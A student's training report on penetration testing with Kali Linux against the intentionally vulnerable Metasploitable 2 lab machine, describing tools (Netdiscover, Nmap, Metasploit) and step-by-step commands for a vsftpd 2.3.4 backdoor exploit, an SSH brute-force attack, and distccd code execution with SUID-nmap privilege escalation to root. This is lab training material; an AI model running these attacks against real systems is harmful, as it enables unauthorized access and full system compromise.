A Report of Four Week Training At

CHANDIGARH ENGINEERING COLLEGE,

CGC, LANDRAN, MOHALI

BACHELOR OF TECHNOLOGY

TRAINING PERIOD: MAY-JUNE 2025

(ARTIFICIAL INTELLIGENCE AND MACHINE
LEARNING)

Submitted By
Name: BRIAN GILL
Roll No.: 2336803
Semester: 5TH
Branch: BTECH CSE
Date of Submissions: 07/07/2025
 DEPARTMENT OF EMERGING TECHNOLOGIES
CHANDIGARH ENGINEERING COLLEGE-CGC

INDEX
S. NO. CONTENT DATE REMARKS
1 Introduction to Kali Linux
2 Introduction to Metasploitable 2
3 Tools Used for Metasploitable 2
4 Attacks Performed
I FTP Attack
II Brute Force Attack
III Privilege Escalation Attack
5 Introduction of Kioptrix Level 1
6 Tools Used for Kioptrix Level 1
7 Attack on Kioptrix Level 1 – Root Access
 1. Introduction to KALI LINUX

About Kali Linux

Kali Linux (formerly known as BackTrack Linux) is an open-source, Debian-
based Linux distribution which allows users to perform advanced penetration
testing and security auditing. It runs on multiple platforms and is freely
available and accessible to both information security professionals and
hobbyists.
This distribution has several hundred tools, configurations, and scripts with
industry-specific modifications that allow users to focus on tasks such as
computer forensics, reverse engineering, and vulnerability detection, instead of
dealing with unrelated activities.
This distribution is specifically tailored to the needs of experienced penetration
testers, so therefore all documentation on this site assumes prior knowledge of,
and familiarity with, the Linux operating system in general. Please see Should I
Use Kali Linux? for more details on what makes Kali unique.
If you wish to review the features of Kali Linux, please see the following page:
Kali Linux Overview.

Kali Linux Features

Completely Free: Kali Linux can be used for free and never asks for
money.

Open Source: Not only is the source code available in the public domain,
but also you are free to change anything.

FHS Compliant: According to an ordinary Linux directory scheme, Kali

Linux uses a basic system of files and folders.

Device Compatibility: It supports a variety of hardware and wireless

devices.

Custom Kernel: Along with the regular kernel, there is a kernel with
injection ability, which is indeed very applicable in a wireless test.

Secure Development: A team that has a secure development process has

developed it.

GPG Signed Packages: Its package authenticity and integrity are ensured
with the help of GPG signing.

Multi-Language Support: It is available in various languages to cater to a

diverse global audience.
 Fully Customizable: The most demanding users who want to change
everything from the UI to the kernel can enjoy it.

ARM Support: The software can run on ARM platform-based devices

such as Raspberry Pi and BeagleBone.

System Requirements for Kali Linux

Component Requirement
CPU 1 GHz single-core processor
RAM 2 GB
Storage 20 GB of free disk space
Graphics Basic graphics support
Boot Mode Legacy or UEFI

Kali Linux Interface

 2. Introduction to Metasploitable 2

About Metasploitable 2
The intentionally vulnerable target machine for evaluating Metasploit. Taking
your first steps with Metasploit can be difficult - especially if you don't want to
conduct your first penetration test on your production network. Metasploitable
is virtual machine based on Linux that contains several intentional
vulnerabilities for you to exploit. Metasploitable is essentially a penetration
testing lab in a box, available as a VMware virtual machine (VMX). (The
Metasploitable login is "msfadmin"; the password is also "msfadmin".)
Metasploitable is created by the Rapid7 Metasploit team. By downloading
Metasploitable from Rapid7.com, you'll be sure to get the latest, clean version
of the vulnerable machine, plus you'll get it from our lightning fast download
servers.
Key Features
Pre-installed vulnerable services (e.g., FTP, SSH, HTTP, Samba)

Weak passwords and outdated software versions

Ideal target for tools like Nmap, Metasploit, Hydra, Nikto, and others

Supports both manual and automated exploitation

Runs as a virtual machine on platforms like VMware or VirtualBox

Default Services on Metasploitable 2

Some of the services that run on Metasploitable 2 include:

Port Service Description

21 vsftpd Vulnerable FTP server
22 OpenSSH SSH service
23 Telnet Insecure remote login
25 SMTP Mail service
80 Apache HTTPD Vulnerable web applications
139 Samba Windows File Sharing
3306 MySQL Database server

These misconfigured services are what make Metasploitable 2 an excellent

target for exploitation and security training.

Why Use Metasploitable 2?

Safe for experimentation without legal or ethical concerns

Works perfectly with Kali Linux tools

Helps in understanding how vulnerabilities are exploited

Useful in CTFs (Capture the Flag) and cybersecurity training sessions

How to Set It Up

Download Metasploitable 2 ISO from Rapid7’s official site

Import into VirtualBox or VMware.

Ensure NAT Network or Host-Only Adapter is set so both Kali and

Metasploitable are on the same subnet.

Boot the VM and note the IP address shown after login.

3. Tools Used for Metasploitable 2

To perform penetration testing on Metasploitable 2, a range of powerful and

essential tools available within Kali Linux are used. These tools form the
backbone of a typical ethical hacking workflow. Each tool plays a critical role
in the Information Gathering, Vulnerability Assessment, Exploitation, and Post-
Exploitation phases of penetration testing.

The process begins by using network discovery tools to identify the target
machine within the local network. Once the target is identified, port scanning
tools help reveal open ports and the services running on them. After mapping
the attack surface, vulnerability scanners and manual enumeration tools help
uncover misconfigurations and weak points. Finally, exploitation frameworks
are used to take advantage of the vulnerabilities and gain access to the target
system.

These tools not only automate many tasks but also provide deep insights into
the security posture of a system. By using them effectively, ethical hackers can
simulate real-world attack scenarios in a controlled environment like
Metasploitable 2, improving their skills in detecting and exploiting system flaws
while learning how to secure them in real-world deployments.

Netdiscover

About Netdiscover
Netdiscover is an active/passive address reconnaissance tool, mainly developed
for those wireless networks without dhcp server, when you are wardriving. It
can be also used on hub/switched networks.

Built on top of libnet and libpcap, it can passively detect online hosts, or search
for them, by actively sending ARP requests.

Netdiscover can also be used to inspect your network ARP traffic, or find
network addresses using auto scan mode, which will scan for common local
networks.
Netdiscover uses the OUI table to show the vendor of the each MAC address
discovered and is very useful for security checks or in pentests.

Usage:
Launches a scan on the local subnet.

Displays IP, MAC address, and manufacturer of detected devices.

Finding the IP address of Metasploitable 2 on the same network as Kali

Linux

Command

Output
NMAP

About NMAP
Nmap ("Network Mapper") is a free and open source utility for network
discovery and security auditing. Many systems and network administrators also
find it useful for tasks such as network inventory, managing service upgrade
schedules, and monitoring host or service uptime. Nmap uses raw IP packets in
novel ways to determine what hosts are available on the network, what services
(application name and version) those hosts are offering, what operating systems
(and OS versions) they are running, what type of packet filters/firewalls are in
use, and dozens of other characteristics. It was designed to rapidly scan large
networks, but works fine against single hosts. Nmap runs on all major computer
operating systems, and official binary packages are available for Linux,
Windows, and Mac OS X.

Features
Supports advanced techniques like TCP/UDP scanning, OS and version
detection, and ping sweeps.

Can scan networks with hundreds of thousands of hosts.

Works on multiple operating systems, including Linux, Windows,

macOS, BSD, Solaris, and more.

Offers both command-line and graphical (GUI) versions

Available for free download with modifiable source code.

Includes manuals, tutorials, whitepapers, and even a full book.

Backed by an active developer and user community via mailing lists and
chat channels.

Recognized with multiple awards and featured in magazines, books, and

movies.

Downloaded by thousands daily; bundled in many Linux distributions.

Command and Output

Metasploit Framework

About Metasploit-Framework
The Metasploit Framework is a Ruby-based, modular penetration testing
platform that enables you to write, test, and execute exploit code. The
Metasploit Framework contains a suite of tools that you can use to test security
vulnerabilities, enumerate networks, execute attacks, and evade detection. At its
core, the Metasploit Framework is a collection of commonly used tools that
provide a complete environment for penetration testing and exploit
development. Accessing MSFconsole MSFconsole provides a command line
interface to access and work with the Metasploit Framework. The MSFconsole
is the most commonly used interface to work with the Metasploit Framework.
The console lets you do things like scan targets, exploit vulnerabilities, and
collect data.

Features
Contains thousands of ready-to-use exploits for known vulnerabilities

Supports various payloads like reverse shell, bind shell, and Meterpreter

Enables post-exploitation tasks such as privilege escalation and data extraction

Includes auxiliary modules for scanning, fuzzing, and brute-force attacks

Integrates with tools like Nmap, Nessus, and Nikto

Offers a powerful command-line interface (msfconsole)

Supports database logging to manage hosts and vulnerabilities

Command
Output

4. Attacks performed on
Metasplitable 2

FTP ATTACK
Objective:
To exploit a known vulnerability in the vsftpd 2.3.4 FTP service running on
Metasploitable 2 using Metasploit Framework, and gain unauthorized shell
access to the target system.

Tools Used:
Netdiscover – Identify the Target IP

Nmap – To identify open FTP port.

Msfconsole – To launch the exploit module for vsftpd 2.3.4

Steps and Commands:

Step 1: Get root access using the command sudo su.

Step 2: Identify the Target IP using the command

netdiscover.
Step 3: Scan the FTP server using the command
nmap 10.0.2.6 -sV ( -sV option is used for service and version
detection).

Step 4: Launch the Metasploit console using the command

msfconsole.
Step 5: Search for the exploit using the command
search vsftpd.

Step 6: Use exploit number 1 using the command use 1.

Step 7: See the available options in the exploit using the

command show options.
Step 8: Set the RHOST using the command set RHOST
10.0.2.6.

Step 9: Set the payload using the command set payload

cmd/unix/interact.

Step 10: Run the exploit using the command run.

Result:
A successful exploitation gives the attacker a remote shell with root privileges,
allowing full control over the system.

BRUTEFORCE
ATTACK
Objective:
To perform a brute force attack on the SSH service (port 22) of Metasploitable 2
using Metasploit Framework, in order to find valid login credentials and gain
unauthorized access.

Tools Used:
Netdiscover – Identify the Target IP

Nmap – To identify open SSH port (Port 22).

Msfconsole – To automate brute-force attempts on SSH

Wordlists– Default or custom username/password wordlists

Steps and Commands:

Step 1: Get root access using the command sudo su.
 Step 2: Identify the Target IP using the command
netdiscover.

Step 3: Scan the Target for SSH using the command nmap -
sV -p 22 10.0.2.6.
Step 4: Launch the Metasploit console using the command
msfconsole.
Step 5: Search for the exploit using the command search
ssh auxiliary login.

Step 6: Use exploit number 4 using the command use 1.

Step 7: See the available options in the exploit using the

command show options.
 Step 8: Set the information and files using the commands
(user.txt and password.txt files needed)
set RHOST 10.0.2.6
set STOP_ON_SUCCESS true
set VERBOSE true
set USER_FILE /home/kali/Desktop/user.txt
set PASS_FILE /home/kali/Desktop/password.txt

Step 9: Run the exploit using the command run.

Metasploit will now start testing combinations. If it finds a valid credential, it

will display.
Result:
Using Metasploit, we successfully brute-forced SSH login credentials for
Metasploitable 2.

PRIVILEGE
ESCALATION
ATTACK
Objective:
To exploit a known vulnerability in the distccd service running on
Metasploitable 2 using Metasploit, leading to remote code execution and
root shell access.

Tools Used:
Netdiscover – Identify the Target IP

Nmap – To identify open distccd service port

Msfconsole – To exploit the vulnerable distccd service

Steps and Commands:

Step 1: Get root access using the command sudo su.

Step 2: Identify the target ip using the command

netdiscover.
Step 3: Scan the target for distccd using the command nmар
192.168.1.36 -р 3000-4000 -sV.

Step 4: Launch the Metasploit console using the command

msfconsole.
Step 5: Search for the exploit using the command
search distccd.

Step 6: Use exploit number 4 using the command use 0.

Step 7: See the available options in the exploit using the
command show options.

Step 8: Set the RHOST using the command set RHOST

192.168.1.36.

Step 9: See the available payload options using the

command show payloads.
Step 10: Use exploit number 6 using the command set
payload 6.

Step 11: Run the exploit using the command run.

Step 12: As we are not a root user so to get root access run
the following commands
python -c 'import pty;pty.spawn("/bin/bash")'
find /-perm -u=s -type f 2>/dev/null
nmap ––interactive
!sh
whoami
id
Result:
We successfully gained root access to Metasploitable 2 by chaining a remote
code execution vulnerability in distccd with manual privilege escalation
techniques.
 Summary of Attacks on
Metasploitable 2
We have successfully performed three major types of attacks on the
Metasploitable 2 virtual machine using Kali Linux tools and Metasploit
Framework. These included:

FTP Attack – Exploiting a backdoor vulnerability in vsftpd 2.3.4 to gain

shell access.

Brute Force Attack – Cracking SSH login credentials using Metasploit’s

auxiliary module.

Privilege Escalation Attack – Gaining limited shell via the vulnerable

distccd service and then escalating privileges to root by manually
exploiting system weaknesses.

These attacks demonstrate how vulnerable services and misconfigurations can

lead to complete system compromise. The process also highlights the
importance of regular patching, strong password policies, and minimizing
exposure of unnecessary services.